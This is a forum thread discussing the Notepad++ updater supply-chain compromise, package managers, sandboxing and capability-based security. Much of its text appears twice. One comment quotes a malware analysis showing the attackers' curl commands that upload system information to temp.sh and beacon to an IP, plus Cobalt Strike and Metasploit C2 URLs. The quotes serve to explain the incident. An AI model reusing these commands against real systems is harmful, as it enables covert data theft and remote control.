The WinGUp updater compromise is a textbook example of why update mechanisms are such high-value targets. Attackers get code execution on machines that specifically trust the update channel.
What's concerning is the 6-month window. Supply chain attacks are difficult to detect because the malicious code runs with full user permissions from a "trusted" source. Most endpoint protection isn't designed to flag software from a legitimate publisher's update infrastructure.
For organizations, this argues for staged rollouts and network monitoring for unexpected outbound connections from common applications. For individuals, package managers with cryptographic verification at least add another barrier - though obviously not bulletproof either.
The lack of a well-known, well-designed package manager for Windows has always been a problem. Too many programs, including FOSS programs, are downloaded from suspicious-looking websites with tons of ads, and every app updates itself in a different way.
The crappy installation and update channels are often tightly integrated with the vendors' monetization strategies, so there's a huge amount of inertia.
Microsoft Store could have changed this situation, had it been better designed and better received. Unfortunately, nobody seems to use it unless they have no other choice.
WinGet looks much better, but so far it's only for developers and power users.
The Microsoft store would have needed proper vetting and support for normal desktop apps from day 1 for it to actually have been a good option. Also, not requiring the system be set up with an online account would have been helpful for adoption.
I can't say it would have guaranteed people would have liked it, just that those were needed for it to have a chance.
> Microsoft Store could have changed this situation
Don't you need to create a Microsoft account to use it? That makes sense for a store where you buy apps with money, but not for a package manager for free software like Notepad++.
P.S. I'm waiting for the day you need a registered Ubuntu account to use their snap store :(
The stupid thing is that a packaging system - MSI and later MSIX - has existed for a long time. But the tooling for it, to put things into packages, is a mess; nor is there a single tool even for Microsoft's own stuff. They really need to get onto dogfooding this stuff.
But then, in an environment dominated by corporate IT who have no real means of switching, why improve the product?
The thing is that I trust the Debian maintainers, so I use dpkg to install my software. I do not trust Microsoft, so I use the browser to install software.
If you trust Microsoft enough to run their operating system, you trust them enough to develop a package manager.
Suppose, for example, that they caught up to where Debian was 30 years ago and Windows shipped with a default list of sources for the core OS to which you could add your internal or preferred partners (e.g. Adobe in many companies). Literally millions of systems wouldn’t have been compromised because they had unpatched apps. If they’d had a curated list of responsible vendors, multiple generations of people wouldn’t have been trained that it’s normal to run installers because a web page told you so.
Why wouldn't those also become a target, if they would grow to be sizable?
And if they have prevention mechanisms, why can't existing supply chains be secured with similar prevention mechanisms, instead of funneling to a single package manager provider?
The supply chain for Notepad++ updates was a PHP script on a shared hosting account pointing to the URL of an executable file.
Surely someone with more resources and more sets of eyes could do better than that? AFAIK nobody has compromised Debian's APT repositories and Red Hat's RPM repositories yet.
Do you really need the entire walled garden of the store? It's not impervious just harder to attack but due to it's scale and value it will be constantly attacked. Not a great trade.
What happened to just good old OS APIs? You could wrap the entire "secure update" process into a function call. Does Windows somehow not already have this?
The value of the store is curation: if the random scammers who put up “Totally Acrobat PDF” websites can’t get listed, it’s safer for people who aren’t security experts to trust the installer isn’t blatant malware.
The problem is that this needs strong regulation to prevent it from turning into a payola marketing scam where vendors have to pay for placement.
I'm sure updating can be done with OS APIs, though MS doesn't look like they're in any hurry to integrate even their own store with the Windows Update mechanism.
The problem is finding and installing new software. Without a well-known official repository, people end up downloading Windows apps from random websites filled with ads and five different "Download" buttons, bundled with everything from McAfee to Adobe Reader.
We should be asking how to enable adding external sources like Ubuntu PPAs (which can then be updated like the rest), not whether there should be an official repository to bootstrap the package manager in the first place. "Store" is just a typical name for such a repository, it's not mandatory.
Notepad++ is one of my favourite editors, now it is forbidden by IT and checked for on security compliance checks if still installed, thanks to this attack.
This attack highlights a broader pattern: developers and users increasingly trust code they haven't personally reviewed.
Supply chain attacks work because we implicitly trust the update channel. But the same trust assumption appears in other places:
- npm/pip packages where we `npm install` without auditing
- AI-generated code that gets committed after a quick glance
- The growing "vibe coding" trend where entire features are scaffolded by AI
The Notepad++ case is almost a best-case scenario — it's a single binary from a known source. The attack surface multiplies when you consider modern dev workflows with hundreds of transitive dependencies, or projects where significant portions were AI-generated and only superficially reviewed.
Sandboxing helps, but the real issue is the gap between what code can do and what developers expect it to do. We need better tooling for understanding what we're actually running.
> increasingly trust code they haven't personally reviewed
while the problems you describe are valid, my personal experience is fully opposite — trust is decreasing. I do not remember anyone worrying about supply chain 15ish years ago — windows was where the viruses lived, and unix people were installing distros, compiling kernel modules and building tarballs without auditing anything.
Sandboxing certainly helps but it’s not a panacea: for example, Notepad++ is exactly the kind of utility people would grant access to edit system files and they would have trusted the updater, too.
I use Notepad++ as a Notepad replacement. I never understood why the network connectivity is enabled by default at all. The first thing I did was to disable it as the constant nagging interrupted my flow (VS Code would do the same thing BTW). I currently have a version from 2020 I'm very happy with.
If one day, maybe in 10 or 20 years time, I feel Notepad++ lacks something and I decide to upgrade, I will do it myself, I don't need a handy helper.
MacOS has been getting a lot of flak recently for (correct) UI reasons, but I honestly feel like they're the closest to the money with granular app permissions.
Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps. Not because OS vendors want to control what apps do, but because users do. If the FOSS community continues to ignore proper security sandboxing and distribution of end user applications, then it will just end up entirely centralised in one of the big tech companies, as it already is on iOS and macOS by Apple.
I knock on your door.
You invite me to sit with you in your living room.
I can't easily sneak into your bed room. Further, your temporary access ends as soon as you exit my house.
The same should happen with apps.
When I run 'notepad dir1/file1.txt', the package should not sneakily be able to access dir2. Further, as soon as I exit the process, the permission to access dir1 should end as well.
A better example would be requiring the mailman to obtain written permission to step on your property every day. Convenience trumps maximal security for most people.
> When I run 'notepad dir1/file1.txt', the package should not sneakily be able to access dir2.
What happens if the user presses ^O, expecting a file open dialog that could navigate to other directories? Would the dialog be somehow integrated to the OS and run with higher permissions, and then notepad is given permissions to the other directory that the user selects?
Pretty sure that’s how it works on iOS. The app can only access its own sandboxed directory. If it wants anything else, it has to use a system provided file picker that provides a security scoped url for the selected file.
Because security people often does not know the balance between security and usability, and we end up with software that is crippled and annoying to use.
I think we could get a lot further if we implement proper capability based security. Meaning that the authority to perform actions follows the objects around. I think that is how we get powerful tools and freedom, but still address the security issues and actually achieve the principle of least privilege.
For FreeBSD there is capsicum, but it seems a bit inflexible to me. Would love to see more experiments on Linux and the BSDs for this.
FreeBSD used to have an ELF target called "CloudABI" which used Capsicum by default.
Parameters to a CloudABI program were passed in a YAML file to a launcher that acquired what was in practice the program's "entitlements"/"app permissions" as capabilities that it passed to the program when it started.
I had been thinking of a way to avoid the CloudABI launcher.
The entitlements would instead be in the binary object file, and only reference command-line parameters and system paths.
I have also thought of an elaborate scheme with local code signing to verify that only user/admin-approved entitlements get lifted to capabilities.
However, CloudABI got discontinued in favour of WebAssembly (and I got side-tracked...)
A capability model wouldn't have prevented the compromised binary from being installed, but it would totally prevent that compromised binary from being able to read or write to any specific file (or any other system resource) that Notepad++ wouldn't have ordinarily had access to.
The original model of computer security is "anything running on the machine can do and touch anything it wants to".
A slightly more advanced model, which is the default for OSes today, is to have a notion of a "user", and then you grant certain permissions to a user. For example, for something like Unix, you have the read/write/execute permissions on files that differ for each user. The security mentioned above just involves defining more such permissions than were historically provided by Unix.
But the holy grail of security models is called "capability-based security", which is above and beyond what any current popular OS provides. Rather than the current model which just involves talking about what a process can do (the verbs of the system), a capability involves taking about what a process can do an operation on (the nouns of the system). A "capability" is an unforgeable cryptographic token, managed by the OS itself (sort of like how a typical OS tracks file handles), which grants access to a certain object.
Crucially, this then allows processes to delegate tasks to other processes in a secure way. Because tokens are cryptographically unforgeable, the only way that a process could have possibly gotten the permission to operate on a resource is if it were delegated that permission by some other process. And when delegating, processes can further lock down a capability, e.g. by turning it from read/write to read-only, or they can e.g. completely give up a capability and pass ownership to the other process, etc.
Yet we look at phones, and we see people accepting outrageous permissions for many apps: They might rely on snooping into you for ads, or anything else, and yet the apps sell, and have no problem staying in stores.
So when it's all said and done, I do not expect practical levels of actual isolation to be that great.
> Yet we look at phones, and we see people accepting outrageous permissions for many apps
The data doesn't support the suggestion that this is happening on any mass scale. When Apple made app tracking opt-in rather than opt-out in iOS 14 ("App Tracking Transparency"), 80-90% of users refused to give consent.
It does happen more when users are tricked (dare I say unlawfully defrauded?) into accepting, such as when installing Windows, when launching Edge for the first time, etc. This is why externally-imposed sandboxing is a superior model to Zuck's pinky promises.
For all its other problems, App Store review prevents a lot of this: you have to explain why your app needs entitlements A, B and C, and they will reject your update if they don't think your explanation is good enough. It's not a perfect system, but iOS applications don't actually do all that much snooping.
I assumed the primary feature of Flatpak was to make a “universal” package across all Linux platforms. The security side of things seems to be a secondary consideration. I assume that the security aspect is now a much higher priority.
Many apps require unnecessarily broad permissions with Flatpak. Unlike Android and iOS apps they weren't designed for environments with limited permissions.
The XDG portal standards being developed to provide permissions to apps (and allow users to manage them), including those installed via Flatpak, will continue to be useful if and when the sandboxing security of Flatpaks are improved. (In fact, having the frontend management part in place is kind of a prerequisite to really enforcing a lot of restrictions on apps, lest they just stop working suddenly.)
I intensely hate that a stupid application can modify .bashrc and permanently persist itself.
Sure, in theory, SELinux could prevent this. But seems like an uphill battle if my policies conflict with the distro’s. I’d also have to “absorb” their policies’ mental model first…
I tend to think things like .bashrc or .zshrc are bad ideas anyways. Not that you asked but I think the simpler solution is to have those files be owned by root and not writable by the user. You're probably not modifying them that often anyways.
> Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps.
Linux people are NOT resistant to this. Atomic desktops are picking up momentum and people are screaming for it. Snaps, flatpaks, appimages, etc. are all moving in that direction.
As for plain development, sadly, the OS developers are simply ignoring the people asking. See:
I'm sure that will contribute to the illusion of security, but in reality the system is thoroughly backdoored on every level from the CPU on up, and everyone knows it.
There is no such thing as computer security, in general, at this point in history.
There's a subtlety that's missing here: if your threat model doesn't include the actors who can access those backdoors, then computer security isn't so bad these days.
That subtlety is important because it explains how the backdoors have snuck in — most people feel safe because they are not targeted, so there's no hue and cry.
The backdoors snuck in because literally everyone is being targeted.
Few people ever see the impact of that themselves or understand the chain of events that brought those impacts about.
And yet, many people perceive a difference between “getting hacked” and “not getting hacked” and believe that certain precautions materially affect whether or not they end up having to deal with a hacking event.
Are they wrong? Do gradations of vulnerability exist? Is there only one threat model, “you’re already screwed and nothing matters”?
I'm sure you're right; however, there is still a distinction between the state using my device against me and unaffiliated or foreign states using my device against me or more likely simply to generate cash for themselves.
I almost feel like this should just be the default action for all applications. I don't need them to escape out of a defined root. It's almost like your documents and application are effectively locked together. You have to give permissions for an app to extra data from outside of the sandbox.
Linux has this capability, of course. And it seems like MacOS prompts me a lot for "such and such application wants to access this or that". But I think it could be a lot more fine-grained, personally.
I've been arguing for this for years. There's no reason every random binary should have unfettered, invisible access to everything on my computer as if it were me.
iOS and Android both implement these security policies correctly. Why can't desktop operating systems?
The short answer is tech debt. The major mobile OSes got to build a new third party software platform from day 0 in the late 2000s, one which focused on and enforced priorities around power consumption and application sandboxing from the getgo etc.
The most popular desktop OSes have decades of pre-existing software and APIs to support and, like a lot of old software, the debt of choices made a long time ago that are now hard/expensive to put right.
The major desktop OSes are to some degree moving in this direction now (note the ever increasing presence of security prompts when opening "things" on macOS etc etc), but absent a clean sheet approach abandoning all previous third party software like the mobile OSes got, this arguably can't happen easily over night.
Mobile platforms are entirely useless to me for exactly this reason, individual islands that don't interact to make anything more generally useful. I would never use any os that worked like that, it's for toys and disposable software only imo.
Mobile platforms are far more secure than desktop computing software. I'd rather do internet banking on my phone than on my computer. You should too.
We can make operating systems where the islands can interact. Its just needs to be opt in instead of opt out. A bad Notepad++ update shouldn't be able to invisibly read all of thunderbird's stored emails, or add backdoors to projects I'm working on or cryptolocker my documents. At least not without my say so.
I get that permission prompts are annoying. There are some ways to do the UI aspect in a better way - like have the open file dialogue box automatically pass along permissions to the opened file. But these are the minority of cases. Most programs only need to access to their own stuff. Having an OS confirmation for the few applications that need to escape their island would be a much better default. Still allow all the software we use today, but block a great many of these attacks.
Both are true, and both should be allowed to exist as they serve different purposes.
Sound engineers don't use lossy formats such as MP3 when making edits in preproduction work, as its intended for end users and would degrade quality cumulatively. In the same way someone working on software shouldn't be required to use an end-user consumption system when they are at work.
It would be unfortunate to see the nuance missed just because a system isn't 'new', it doesn't mean the system needs to be scrapped.
> In the same way someone working on software shouldn't be required to use an end-user consumption system when they are at work.
I'm worried that many software developers (including me, a lot of the time) will only enable security after exhausting all other options. So long as there's a big button labeled "Developer Mode" or "Run as Admin" which turns off all the best security features, I bet lots of software will require that to be enabled in order to work.
Apple has quite impressive frameworks for application sandboxing. Do any apps use them? Do those DAWs that sound engineers use run VST plugins in a sandbox? Or do they just dyld + call? I bet most of the time its the latter. And look at this Notepad++ attack. The attack would have been stopped dead if the update process validated digital signatures. But no, it was too hard so instead they got their users' computers hacked.
I'm a pragmatist. I want a useful, secure computing environment. Show me how to do that without annoying developers and I'm all in. But I worry that the only way a proper capability model would be used would be by going all in.
There is a middle ground (maybe even closer to more limited OS design principles) exist. It is not just toys. Otherwise neither UWP on Windows nor Flatpaks or Firejail would exist nor systemd would implement containerization features.
In such a scenario, you can launch your IDE from your application manager and then only give write access to specific folders for a project. The IDE's configuration files can also be stored in isolated directories. You can still access them with your file manager software or your terminal app which are "special" and need to be approved by you once (or for each update) as special. You may think "How do I even share my secrets like Git SSH keys?". Well that's why we need services like the SSH Agent or Freedesktop secret-storage-spec. Windows already has this btw as the secret vaults. They are there since at least Windows 7 maybe even Vista.
If a sandbox is optional then it is not really a good sandbox
naturally even flatpak on Linux suffers from this as legacy software simply doesn’t have a concept of permission models and this cannot be bolted on after the fact
The containers are literally the "bolting on". You need to give the illusion of the software is running under a full OS but you can actually mount the system directories as read-only.
and you still need to mount volumes and add all sorts of holes in the sandbox for applications to work correctly and/or be useful
try to run gimp inside a container for example, you’ll have to give access to your ~/Pictures or whatever for it to be useful
Compared to some photo editing applications on android/iOS which can work without having filesystem access by getting the file through the OS file picker
running apps in a sandbox is ok, but remember to disable internet access. A text editor should not require it, and can be used to exfiltrate the text(s) you're editing.
When started, it sends a heartbeat containing system information to the attackers. This is done through the following steps:
3 Then it uploads the 1.txt file to the temp[.]sh hosting service by executing the curl.exe -F "file=@1.txt" -s https://temp.sh/upload command;
4 Next, it sends the URL to the uploaded 1.txt file by using the curl.exe --user-agent "https://temp.sh/ZMRKV/1.txt" -s http://45.76.155[.]202
--
The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance, it uses the GET request URL https://45.77.31[.]210/api/update/v1 and the POST request URL https://45.77.31[.]210/api/FileUpload/submit.
--
The second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL https://45.77.31[.]210/users/admin
Not what the OP is referring to, but UWP and successor apps were always sandboxed, from the time of Windows 8 onwards. This was derived from the Windows Mobile model, which in turn was emulating the Android/iOS app model.
The only way to clean up an infected Windows system is to wipe your disk and reinstall the OS.
There are so many nooks and crannies where malware can hide, and Windows doesn't enforce any boundaries that can't be crossed with a trivial UAC dialog.
I'd say it's more true on Linux that malware can hide anywhere if you allow a sudo prompt (which people have been unfortunately been trained is normal when installing software).
Windows enforces driver signing and has a deeper access control system that means a root account doesn't even truly exist. The SYSTEM pseudo-account looks like it should be that, but you can actually set up ACLs that make files untouchable by it. In fact if you check the files in System32, they are only writable by TrustedInstaller. A user's administrative token and SYSTEM have no access those files.
But when it comes down to it, I wouldn't trust any system that has had malware on it. At the very least I'd do a complete reinstall. It might even be worth re-flashing the firmware of all components of the system too, but the chances of those also being infected are lower as long as signed firmware is required.
Malware can't modify files in System32, but it can drop extra files in there no problem. The only way to find and clean them up is a clean install.
In Linux, one could write a script that reinstalls all packages, cleans up anything that doesn't belong to an installed package, and asks you about files it's not sure about. It's easy to modify a Linux system, but just as easy to restore it to a known state.
Well, try again. I just managed to copy a random .exe to C:\Windows\System32 using an administrator account. I got a typical UAC dialog that most people would blindly click "Continue" on, and the copy succeeded. :)
not to mention secure boot kernel protection, protected folders , memory protection, real time scanning , real time behavioral scanning, signature scanning, code signing. And Windows S mode protection.
Malware and supply chain attack landscape is totally different now. Linux has many more viruses than in the past . People don’t actively scan because they are operating on a 1990s mindset
I'm out of the loop: How did they bypass Notepad++'s digital signatures? I just downloaded it to double-check, and the installer is signed with a valid code-signing certificate.
It now seems to be best practice to simultaneously keep things updated (to avoid newly discovered vulnerabilities), but also not update them too much (to avoid supply chain attacks). Honestly not sure how I'm meant to action those at the same time.
In the early days, updates quite often made systems less stable, by a demonstrable margin. My dad once turned off all updates on his Windows machine, with the ensuing peril that you can imagine.
Sadly, it feels like Microsoft updates lately have trended back towards being unreliable and even user hostile. It's messed up if you update and can't boot your machine afterwards, but here we are. People are going to turn off automatic updates again.
The easiest way to action as a user seems like it would be to use local package managers that includes something like Dependabot's cooldown config. I'm not aware of any local package managers that do something like this?
You basically need to make a trade-off between 0days and supply chain attacks. Browsers, office suite, media players, archivers, and other programs that are connected to the internet and are handling complex file formats? Update regularly, or at least keep an eye out for CVEs. A text editor, or any other program that doesn't deal with risky data? You're probably fine with auto update turned off
>Using notepad++ (or whatever other program) in a manner that deals with internet content a lot - then updating is the thing.
Disagree. It's hard to screw up a text editor so much that you have buffer overflows 10 years after it's released, so it's probably safe. It's not impossible, but based on a quick search (though incomplete because google is filled with articles describing this incident) it doesn't look like there were any vulnerabilities that could be exploited by arbitrary input files. The most was some dubious vulnerability around being able to plant plugins.
Supply chain attacks have impact on more systems, so it's more likely that your system is one of it. Opening a poisoned textfile that contains a exploit that attacks your text editor and fits exactly to your version is a rare event compared to automatically contacting a server to ask for a executable to execute without asking you.
Unless there's an announcement of a zero day, update a month after each new release. Keeps you on a recent version while giving security systems and researchers time to detect threats.
Debian stable. If you need something to be on the bleeding edge install it from backports or build from source. But keep most of your system boring and stable. It has worked fine for me for years.
I don't think you understand Debian. There's a new release every 2 years. A few months before every release there's the so called package freeze on the testing branch. The version the packages are on at that point that's the version they will have for the next stable release. Between releases the only updates are security updates.
Do you mean I should worry about the fixed CVEs that are announced and fixed for every other distribution at the same time? Is that the supply-chain attack you're referring to?
Naive question, but isn't this relatively safe information to expose for this level of attack? I guess the idea is to find systems vulnerable to 0-day exploits and similar based on this info? Still, that seems like a lot of effort just to get this data.
it's not "just to get that data", it's to confirm level of access, check for potential other exploiters or security software, identify the machine you have access to, identify what the machine has network connectivity to, etc. The attacker then maintains the c2 channel and can then perform their actual objective with the help of the data they have obtained.
You would be a dumbass to do that, because virustotal allows security researchers to see submitted samples/urls. The last thing you want to do is to draw attention to your C&C server.
I just checked, I'm on version 8.8.8. With TinyWall firewall, it has no access to the internet without my explicit say so. This is why constantly trying to be on the bleeding edge of last updates will more likely bite you in the ass than leave your system/program open to attack with some unpatched vulnerability. Look at Windows 11 updates lately. I bet most users would be gladly behind with their updates right now.
I recommend removing notepad++ and installing via winget which installs the EXE directly without the winGUP updater service.
Here's an AI summary explaining who is affected.
Affected Versions: All versions of Notepad++ released prior to version 8.8.9 are considered potentially affected if an update was initiated during the compromise window.
Compromise Window: Between June 2025 and December 2, 2025.
Specific Risk: Users running older versions that utilized the WinGUp update tool were vulnerable to being redirected to malicious servers. These servers delivered trojanized installers containing a custom backdoor dubbed Chrysalis.
Thankfully the responses weren’t outright dismissive, which is usually the case in these situations.
It was thought to be a local compromise and nothing to do Notepad++.
Good lessons to be learned here. Don’t be quick to dismiss things simply because it doesn’t fit what you think should be happening. That’s the whole point. It doesn’t fit, so investigate why.
Most tech support aims to prove the person wrong right out the gate.
It's listed as the third most popular IDE after Visual Studio Code and Visual Studio by respondents to Stack Overflow's annual survey. Interestingly, it's higher among professionals than learners. Maybe that's because learners are going to be using some of those newer AI-adjacent editors, or because learners are less likely to be using Windows at all.
I'm sure people will leap to the defense of their chosen text editor, like they always do. "Oh, they separated vim and Neovim! Those are basically the same! I can combine those, really, to get a better score!" But I think a better takeaway is that it's incredible that Notepad++, an open source application exclusive to Windows that has had, basically, a single developer over the course of 22 years, has managed to reach such a widespread audience. Especially when Scintilla's other related editors (SciTE, EditPlus) essentially don't rate.
I think the argument you made for combining vim and neovim is pretty good actually. But it seems pretty unique to those two editors (well, throw vi in there if it ever shows up on the chart), so “worst” case notepad++ would be bumped down just one spot.
If vim were good enough, neovim wouldn't exist. If neovim were that much better, vim wouldn't still be as popular as it is. And if neither of them did anything worth picking up, then vi would still outrank them.
The conclusion is that they don't do the same things. They just both have the vi interface. But having a vi interface isn't particularly weird anymore. SublimeText and vscode have vi bindings. So does PyCharm/IntelliJ. So does Notepad++! Heck, so does nano! So who gets to claim those editors? Vscode is the most popular editor that supports a vi-like interface. Shouldn't that mean that vscode is the best of the "vi descendants"? Or does it mean that all these people were okay with the vi interface, but had a good reason not to make the choice they did for another editor?
Fundamentally, the issue is: Either choice matters, or popularity doesn't matter. You can't have it both ways.
>Maybe that's because learners are going to be using some of those newer AI-adjacent editors, or because learners are less likely to be using Windows at all.
You can use the 2022 (ie. pre-chatgpt) results for control for that. The results are basically the same.
I enjoy coding something new up in Notepad++, without any annoying autocomplete and jank. I call it unplugged (acoustic?) mode. Jeepers Visual Studio these days starts autocompleting if and while for example and sometimes doesn't respect normal keystrokes because it expects me to complete these kind of interactions instead.
I love a feature of notepad++ where when you have documents open and exit, it won't bother you with a save dialog and when you open it again the previous state will be there. I found that mousepad on linux can do this.
For something functionality close I would look at Kate.
I love and hate it at the same time, just like my browser tabs hoarding, it means I currently have 218 open documents on Notepad++ (and 96 browser tabs). I might not even need them anymore, but it's always "I'll look at them... later".
For the browser you can use something like Session Buddy. Save the session and move on secure in the knowledge that the tabs are there IF you need them.
At least in past I gave up and just used N++ with Wine. It didn't fit the rest of system at all, but was more usable for editing simple text files than DE defaults of GEdit and Kate.
What's concerning is the 6-month window. Supply chain attacks are difficult to detect because the malicious code runs with full user permissions from a "trusted" source. Most endpoint protection isn't designed to flag software from a legitimate publisher's update infrastructure.
For organizations, this argues for staged rollouts and network monitoring for unexpected outbound connections from common applications. For individuals, package managers with cryptographic verification at least add another barrier - though obviously not bulletproof either.
The crappy installation and update channels are often tightly integrated with the vendors' monetization strategies, so there's a huge amount of inertia.
Microsoft Store could have changed this situation, had it been better designed and better received. Unfortunately, nobody seems to use it unless they have no other choice.
WinGet looks much better, but so far it's only for developers and power users.
I can't say it would have guaranteed people would have liked it, just that those were needed for it to have a chance.
Don't you need to create a Microsoft account to use it? That makes sense for a store where you buy apps with money, but not for a package manager for free software like Notepad++.
P.S. I'm waiting for the day you need a registered Ubuntu account to use their snap store :(
But then, in an environment dominated by corporate IT who have no real means of switching, why improve the product?
Suppose, for example, that they caught up to where Debian was 30 years ago and Windows shipped with a default list of sources for the core OS to which you could add your internal or preferred partners (e.g. Adobe in many companies). Literally millions of systems wouldn’t have been compromised because they had unpatched apps. If they’d had a curated list of responsible vendors, multiple generations of people wouldn’t have been trained that it’s normal to run installers because a web page told you so.
And if they have prevention mechanisms, why can't existing supply chains be secured with similar prevention mechanisms, instead of funneling to a single package manager provider?
Surely someone with more resources and more sets of eyes could do better than that? AFAIK nobody has compromised Debian's APT repositories and Red Hat's RPM repositories yet.
What happened to just good old OS APIs? You could wrap the entire "secure update" process into a function call. Does Windows somehow not already have this?
The problem is that this needs strong regulation to prevent it from turning into a payola marketing scam where vendors have to pay for placement.
The Store uses that behind the scenes. You don't have to use the store to use the system update system.
It's particularly good because updates can happen in the background, without having to launch your app to trigger them.
The problem is finding and installing new software. Without a well-known official repository, people end up downloading Windows apps from random websites filled with ads and five different "Download" buttons, bundled with everything from McAfee to Adobe Reader.
We should be asking how to enable adding external sources like Ubuntu PPAs (which can then be updated like the rest), not whether there should be an official repository to bootstrap the package manager in the first place. "Store" is just a typical name for such a repository, it's not mandatory.
Supply chain attacks work because we implicitly trust the update channel. But the same trust assumption appears in other places:
- npm/pip packages where we `npm install` without auditing - AI-generated code that gets committed after a quick glance - The growing "vibe coding" trend where entire features are scaffolded by AI
The Notepad++ case is almost a best-case scenario — it's a single binary from a known source. The attack surface multiplies when you consider modern dev workflows with hundreds of transitive dependencies, or projects where significant portions were AI-generated and only superficially reviewed.
Sandboxing helps, but the real issue is the gap between what code can do and what developers expect it to do. We need better tooling for understanding what we're actually running.
while the problems you describe are valid, my personal experience is fully opposite — trust is decreasing. I do not remember anyone worrying about supply chain 15ish years ago — windows was where the viruses lived, and unix people were installing distros, compiling kernel modules and building tarballs without auditing anything.
This has been true since we left the era where you typed the program in each time you ran it. Ken Thompson rather famously wrote about this four decades ago: https://www.cs.umass.edu/~emery/classes/cmpsci691st/readings...
Sandboxing certainly helps but it’s not a panacea: for example, Notepad++ is exactly the kind of utility people would grant access to edit system files and they would have trusted the updater, too.
If one day, maybe in 10 or 20 years time, I feel Notepad++ lacks something and I decide to upgrade, I will do it myself, I don't need a handy helper.
There is no reason for a tool to implicitly access my mounted cloud drive directory and browser cookies data.
Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps. Not because OS vendors want to control what apps do, but because users do. If the FOSS community continues to ignore proper security sandboxing and distribution of end user applications, then it will just end up entirely centralised in one of the big tech companies, as it already is on iOS and macOS by Apple.
Think about it from a real world perspective.
I knock on your door. You invite me to sit with you in your living room. I can't easily sneak into your bed room. Further, your temporary access ends as soon as you exit my house.
The same should happen with apps.
When I run 'notepad dir1/file1.txt', the package should not sneakily be able to access dir2. Further, as soon as I exit the process, the permission to access dir1 should end as well.
Asking continuously is worse than not asking at all…
But fine lock windows down for normal users as long as I can still disable all the security. We don't need another Apple.
That's what I with my sandbox right now
What happens if the user presses ^O, expecting a file open dialog that could navigate to other directories? Would the dialog be somehow integrated to the OS and run with higher permissions, and then notepad is given permissions to the other directory that the user selects?
There’s also a similar photos picker (PHPicker) which is especially good from 2023 on. Signal uses this for instance.
Because security people often does not know the balance between security and usability, and we end up with software that is crippled and annoying to use.
For FreeBSD there is capsicum, but it seems a bit inflexible to me. Would love to see more experiments on Linux and the BSDs for this.
I had been thinking of a way to avoid the CloudABI launcher. The entitlements would instead be in the binary object file, and only reference command-line parameters and system paths. I have also thought of an elaborate scheme with local code signing to verify that only user/admin-approved entitlements get lifted to capabilities.
However, CloudABI got discontinued in favour of WebAssembly (and I got side-tracked...)
Redox is also moving towards having capabilities mapped to fd's, somewhat like Capsicum. Their recent presentation at FOSDEM: https://fosdem.org/2026/schedule/event/KSK9RB-capability-bas...
A slightly more advanced model, which is the default for OSes today, is to have a notion of a "user", and then you grant certain permissions to a user. For example, for something like Unix, you have the read/write/execute permissions on files that differ for each user. The security mentioned above just involves defining more such permissions than were historically provided by Unix.
But the holy grail of security models is called "capability-based security", which is above and beyond what any current popular OS provides. Rather than the current model which just involves talking about what a process can do (the verbs of the system), a capability involves taking about what a process can do an operation on (the nouns of the system). A "capability" is an unforgeable cryptographic token, managed by the OS itself (sort of like how a typical OS tracks file handles), which grants access to a certain object.
Crucially, this then allows processes to delegate tasks to other processes in a secure way. Because tokens are cryptographically unforgeable, the only way that a process could have possibly gotten the permission to operate on a resource is if it were delegated that permission by some other process. And when delegating, processes can further lock down a capability, e.g. by turning it from read/write to read-only, or they can e.g. completely give up a capability and pass ownership to the other process, etc.
https://en.wikipedia.org/wiki/Capability-based_security
So when it's all said and done, I do not expect practical levels of actual isolation to be that great.
The data doesn't support the suggestion that this is happening on any mass scale. When Apple made app tracking opt-in rather than opt-out in iOS 14 ("App Tracking Transparency"), 80-90% of users refused to give consent.
It does happen more when users are tricked (dare I say unlawfully defrauded?) into accepting, such as when installing Windows, when launching Edge for the first time, etc. This is why externally-imposed sandboxing is a superior model to Zuck's pinky promises.
You can use the underlying sandboxing with bwrap. A good alternative is firejail. They are quite easy to use.
I prefer to centralize package management to my distro, but I value their sandboxing efforts.
Personally, I think it's time to take sandboxing seriously. Supply chain attacks keep happening. Defense is depth is the way.
Not sure how something can be called a sandbox without the actual box part. As Siri is to AI, Flatpak is to sandboxes.
My experience with android apps seems to be different. Every other app seems to be asking for contacts or calling or access to files.
Sure, in theory, SELinux could prevent this. But seems like an uphill battle if my policies conflict with the distro’s. I’d also have to “absorb” their policies’ mental model first…
Linux people are NOT resistant to this. Atomic desktops are picking up momentum and people are screaming for it. Snaps, flatpaks, appimages, etc. are all moving in that direction.
As for plain development, sadly, the OS developers are simply ignoring the people asking. See:
https://github.com/containers/toolbox/issues/183
https://github.com/containers/toolbox/issues/348
https://github.com/containers/toolbox/issues/1470
I'll leave it up to you to speculate why.
Perhaps getting a bit of black eye and some negative attention from the Great Orange Website(tm) can light a fire under some folks.
I think you mean a lot of flak? Slack would kind of be the opposite.
There is no such thing as computer security, in general, at this point in history.
Indeed. Why lock your car door as anyone can unlock and steal it by learning lock-picking?
That subtlety is important because it explains how the backdoors have snuck in — most people feel safe because they are not targeted, so there's no hue and cry.
Are they wrong? Do gradations of vulnerability exist? Is there only one threat model, “you’re already screwed and nothing matters”?
It's still worth solving one of these problems.
Linux has this capability, of course. And it seems like MacOS prompts me a lot for "such and such application wants to access this or that". But I think it could be a lot more fine-grained, personally.
iOS and Android both implement these security policies correctly. Why can't desktop operating systems?
The most popular desktop OSes have decades of pre-existing software and APIs to support and, like a lot of old software, the debt of choices made a long time ago that are now hard/expensive to put right.
The major desktop OSes are to some degree moving in this direction now (note the ever increasing presence of security prompts when opening "things" on macOS etc etc), but absent a clean sheet approach abandoning all previous third party software like the mobile OSes got, this arguably can't happen easily over night.
We can make operating systems where the islands can interact. Its just needs to be opt in instead of opt out. A bad Notepad++ update shouldn't be able to invisibly read all of thunderbird's stored emails, or add backdoors to projects I'm working on or cryptolocker my documents. At least not without my say so.
I get that permission prompts are annoying. There are some ways to do the UI aspect in a better way - like have the open file dialogue box automatically pass along permissions to the opened file. But these are the minority of cases. Most programs only need to access to their own stuff. Having an OS confirmation for the few applications that need to escape their island would be a much better default. Still allow all the software we use today, but block a great many of these attacks.
Sound engineers don't use lossy formats such as MP3 when making edits in preproduction work, as its intended for end users and would degrade quality cumulatively. In the same way someone working on software shouldn't be required to use an end-user consumption system when they are at work.
It would be unfortunate to see the nuance missed just because a system isn't 'new', it doesn't mean the system needs to be scrapped.
